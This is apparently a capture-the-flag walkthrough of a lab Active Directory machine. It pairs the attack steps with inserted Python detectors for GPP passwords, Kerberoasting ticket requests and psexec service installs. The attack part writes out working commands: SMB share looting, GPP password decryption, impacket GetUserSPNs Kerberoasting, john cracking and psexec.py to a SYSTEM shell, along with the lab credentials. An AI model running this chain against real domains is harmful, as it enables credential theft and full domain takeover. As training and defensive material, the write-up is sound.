Follow along on my OSCP journey; this is target 6 of TJnull's OSCP list.
How to use this walkthrough?
To avoid the typical answer-on-a-plate style of walkthrough, I have decided to follow the TryHackMe idea of giving you hints along the way to help you when you struggle, and to keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius' multi-threaded AutoRecon, which combines several tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.100
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while waiting for _full_tcp_nmap.txt to finish.
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-01-10 23:13:40Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5722/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49169/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49170/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49182/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
This machine is really nice because there are a lot of services, and going through the process of checking them out will help you filter them faster in the future. We have services such as SMB, Kerberos and LDAP running. Let's focus on these three and explore the rest only if we don't find a path through them.
SMB—139,445
What are the permissions on the shares?
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Looks like there might be interesting things to look at in the Replication share, so we list it recursively.
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
HINT
Look up the known mistakes that are commonly seen in AD group definitions, and make sure not to miss anything in the share.
.
.
.
.
We find the Groups.xml file, which is known to sometimes hold user credentials.
We tried downloading it, but the transfer failed; since we can't download it, we open it directly in the SMB CLI with the "more" command, which works.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
So we find the SVC_TGS credentials:
SVC_TGS:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
HINT
This is an odd password but we can’t really use it in that form. At least we know where we got it from …
.
.
.
.
Kali has a tool to decrypt GPP passwords; the reason it can decrypt them at all is that the encryption key is public.
Now we have usable credentials:
SVC_TGS:GPPstillStandingStrong2k18
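From the defender's side, the lesson of this step is that any cpassword attribute left in SYSVOL is a leaked credential. The following scanner is an added example written for this walkthrough (not the author's code or any Kali tool): it parses Group Policy Preference XML files, reports every element carrying a non-empty cpassword together with the account it belongs to, and can walk a local copy of SYSVOL. The sample documents are constructed inline (the first mirrors the Groups.xml found above); the list of preference file names and account attributes is an assumption based on the GPP file types that can hold passwords, and the code deliberately does not decrypt anything.

```python
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Group Policy Preference files under SYSVOL\<domain>\Policies\ that can carry a
# cpassword attribute (assumed list of the preference types that store passwords)
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")

# Attribute names the different preference types use for the account the password belongs to
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text: str, path: str) -> List[Dict[str, str]]:
    """Return one finding per element in a GPP XML document that has a non-empty cpassword."""
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers; build a child -> parent map once
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:
            continue  # attribute absent or already blanked out: nothing leaked here
        owner = parents.get(elem, elem)  # e.g. the <User> wrapping a <Properties>
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), owner.get("name", ""))
        findings.append({
            "file": path,
            "element": elem.tag,
            "account": account,
            "changed": owner.get("changed", ""),
            "cpassword": cpassword,
        })
    return findings


def scan_sysvol(sysvol_root: str) -> List[Dict[str, str]]:
    """Walk a local copy (or mounted share) of SYSVOL and collect every cpassword finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8-sig") as fh:  # utf-8-sig strips a BOM if present
                try:
                    findings.extend(find_cpasswords(fh.read(), full))
                except ET.ParseError:
                    pass  # malformed policy file: skip it but keep scanning the rest
    return findings


# Constructed sample: the Groups.xml from this walkthrough, reformatted
SAMPLE_GROUPS_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
        changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>'''

# Constructed sample: a policy whose password was removed, which is what a clean SYSVOL should look like
SAMPLE_CLEAN_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" image="2"
        changed="2020-01-01 00:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="" userName="helpdesk"/>
  </User>
</Groups>'''


if __name__ == "__main__":
    for sample, path in ((SAMPLE_GROUPS_XML, "Groups.xml"), (SAMPLE_CLEAN_XML, "clean/Groups.xml")):
        for f in find_cpasswords(sample, path):
            print(f"[!] {f['file']}: <{f['element']}> for {f['account']} (changed {f['changed']}) "
                  f"has a cpassword ({len(f['cpassword'])} chars); remove it and rotate the account")
```

Running scan_sysvol against a copy of the Replication or SYSVOL share gives the list of policies that still need the password removed and the affected accounts rotated.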
What can we do with those credentials now?
Let’s leverage them with SMB and Kerberos
SMB
smbclient \\\\active.htb\\Users -U SVC_TGS
We’re in!
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
smb: \SVC_TGS\Desktop\> get user.txt
Error opening local file user.txt
smb: \SVC_TGS\Desktop\> more user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as /tmp/smbmore.28Ym0X (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
We look around for anything interesting but only find the user flag as a consolation.
Kerberos
HINT
What technique will allow us to use the credentials we have with kerberos?
.
.
.
.
Kerberoasting!!!! (https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/)
Let's use the GetUserSPNs Python script from the impacket project to request the service tickets and extract the hashes.
python3 /opt/impacket/examples/GetUserSPNs.py <domain>/<user>:<password> -dc-ip <ip>
Let’s run the command
sudo python3 /opt/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$9d179d34b671cedefad1faf2b2058d52$...
Hell yeah! We got the admin’s hash.
Time to crack that hash!
John the Ripper
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
We got the admin’s password: Administrator:Ticketmaster1968
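The $krb5tgs$23$ prefix on the hash says the service ticket came back encrypted with etype 23 (RC4-HMAC), which is what makes it crackable with a wordlist. On the domain controller the same request is visible as Event ID 4769, so a defender can spot it. The detection below is an added example written for this walkthrough, not the author's code or part of impacket: it parses constructed key=value renderings of 4769 events (the field names follow the Windows event, but the one-line format and all values are made up), flags successful service-ticket requests for user accounts that used a weak encryption type, and reports requesters that asked for several such tickets, which is the sweep a Kerberoasting tool performs.

```python
import re
from collections import Counter
from typing import Dict, List

# Kerberos encryption type codes as logged in Event 4769 (TicketEncryptionType);
# 0x17 is RC4-HMAC, the type behind hashcat/john's $krb5tgs$23$ format
ETYPE_NAMES = {
    "0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5",
    "0x11": "AES128-CTS-HMAC-SHA1-96", "0x12": "AES256-CTS-HMAC-SHA1-96",
    "0x17": "RC4-HMAC", "0x18": "RC4-HMAC-EXP",
}
WEAK_ETYPES = {"0x1", "0x3", "0x17", "0x18"}

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one 'Key=Value Key=Value' event line into a dict."""
    return dict(KV_RE.findall(line))


def is_roast_candidate(ev: Dict[str, str]) -> bool:
    """True for a successful 4769 for a user (SPN-holding) account with a weak ticket etype."""
    if ev.get("EventID") != "4769":
        return False
    if ev.get("Status", "0x0") != "0x0":
        return False  # failed requests produce no ticket to crack
    service = ev.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and the KDC itself are noise here
    return ev.get("TicketEncryptionType", "").lower() in WEAK_ETYPES


def flag_weak_tgs_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events that look like Kerberoasting ticket requests."""
    return [ev for ev in map(parse_event, lines) if is_roast_candidate(ev)]


def requesters_over_threshold(findings: List[Dict[str, str]], threshold: int) -> List[str]:
    """Requesters that pulled weak tickets for at least `threshold` distinct services."""
    distinct = {(ev["TargetUserName"], ev["ServiceName"]) for ev in findings}
    per_user = Counter(user for user, _service in distinct)
    return sorted(user for user, n in per_user.items() if n >= threshold)


# Constructed sample log: one-line renderings of Security events (values are made up)
SAMPLE_SECURITY_LOG = [
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.50 Status=0x0",
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4768 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0",
]


if __name__ == "__main__":
    hits = flag_weak_tgs_requests(SAMPLE_SECURITY_LOG)
    for ev in hits:
        etype = ETYPE_NAMES.get(ev["TicketEncryptionType"].lower(), ev["TicketEncryptionType"])
        print(f"[!] {ev['TargetUserName']} from {ev['IpAddress']} requested a {etype} ticket for {ev['ServiceName']}")
    for user in requesters_over_threshold(hits, 2):
        print(f"[!!] {user} requested weak tickets for 2+ services: likely Kerberoasting sweep")
```

The two knobs to tune are WEAK_ETYPES (once every service account supports AES, any RC4 request is worth a look) and the threshold, which separates a single legacy client from an account enumerating every SPN in the domain.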
HINT
I ask again, what can we do with those admin creds now 😉
.
.
.
.
PSEXEC!!!
psexec.py active.htb/Administrator:Ticketmaster1968@active.htb
Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
[*] Trying protocol 445/SMB...
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WorAsBXC.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service eYpy on active.htb.....
[*] Starting service eYpy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
We are NT AUTHORITY\SYSTEM; that's GG, and we can grab the root flag.
C:\Users\Administrator\Desktop>more root.txt
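Notice what psexec.py left behind on the host: it wrote a randomly named executable (WorAsBXC.exe) into ADMIN$, which is C:\Windows, and installed it as a service with a random four-letter name (eYpy). Both land in the System event log as a 7045 "service was installed" event. The checker below is an added example written for this walkthrough, not the author's code or part of impacket: it reads constructed one-line renderings of 7045 events (field names follow the Windows event; the line format and the values are made up) and explains why an install looks like a remote-execution tool, covering the impacket pattern seen here, the fixed PSEXESVC name of Sysinternals PsExec, and the generic case of a service binary dropped directly into %SystemRoot%.

```python
import re
from typing import Dict, List, Tuple

# Key=Value pairs, allowing a double-quoted value that contains spaces (e.g. an ImagePath)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Pattern observed above: four-letter service name, eight-letter .exe dropped into %SystemRoot%
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_IMAGE_IN_SYSROOT = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)
# Service names used by well-known remote-execution tools (assumed short list; extend as needed)
KNOWN_REMOTE_EXEC_SERVICES = {"psexesvc"}
# Any executable sitting directly in the Windows directory rather than under System32
EXE_DIRECTLY_IN_SYSROOT = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one 'Key=Value Key="Value with spaces"' event line into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def service_install_reasons(ev: Dict[str, str]) -> List[str]:
    """Reasons a 7045 event looks like a remote-execution tool; empty list means it looks benign."""
    if ev.get("EventID") != "7045":
        return []
    name = ev.get("ServiceName", "")
    image = ev.get("ImagePath", "")
    reasons = []
    if name.lower() in KNOWN_REMOTE_EXEC_SERVICES:
        reasons.append("service name belongs to a known remote-execution tool")
    elif RANDOM_SERVICE_NAME.match(name) and RANDOM_IMAGE_IN_SYSROOT.match(image):
        reasons.append("random 4-letter service name running a random 8-letter .exe from %SystemRoot%")
    elif EXE_DIRECTLY_IN_SYSROOT.match(image):
        reasons.append("service binary sits directly in %SystemRoot% instead of System32")
    if reasons and ev.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def flag_service_installs(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(ServiceName, reasons) for every event that triggered at least one reason."""
    flagged = []
    for ev in map(parse_event, lines):
        reasons = service_install_reasons(ev)
        if reasons:
            flagged.append((ev.get("ServiceName", ""), reasons))
    return flagged


# Constructed sample log: one-line renderings of System events (values are made up,
# the first one mirrors the names psexec.py printed in this walkthrough)
SAMPLE_SYSTEM_LOG = [
    r'EventID=7045 ServiceName=eYpy ImagePath=%systemroot%\WorAsBXC.exe ServiceType="user mode service" StartType="demand start" AccountName=LocalSystem',
    r'EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\PSEXESVC.exe ServiceType="user mode service" StartType="demand start" AccountName=LocalSystem',
    r'EventID=7045 ServiceName=WinDefend ImagePath="C:\Program Files\Windows Defender\MsMpEng.exe" ServiceType="user mode service" StartType="auto start" AccountName=LocalSystem',
    r'EventID=7036 ServiceName=eYpy State=running',
]


if __name__ == "__main__":
    for name, reasons in flag_service_installs(SAMPLE_SYSTEM_LOG):
        print(f"[!] service {name!r}: " + "; ".join(reasons))
```

Pairing these 7045 hits with the 5145 share-access events for ADMIN$ from the same source address gives the full picture: file written to the share, service created, service started.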
What did I learn?
- We learned about SMB enumeration: listing the available shares and their permissions, connecting to a share, and using the recurse capability to quickly dump the contents of all the shares.
- We found out about GPP passwords and the encryption key that is publicly known, which allowed us to decrypt them.
- We learned the concept of Kerberoasting: how any domain user's credentials can be used to request service tickets for accounts that have SPNs and crack their hashes offline.
- We learned how to get a shell with Windows user credentials when SSH isn't available, using PsExec.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.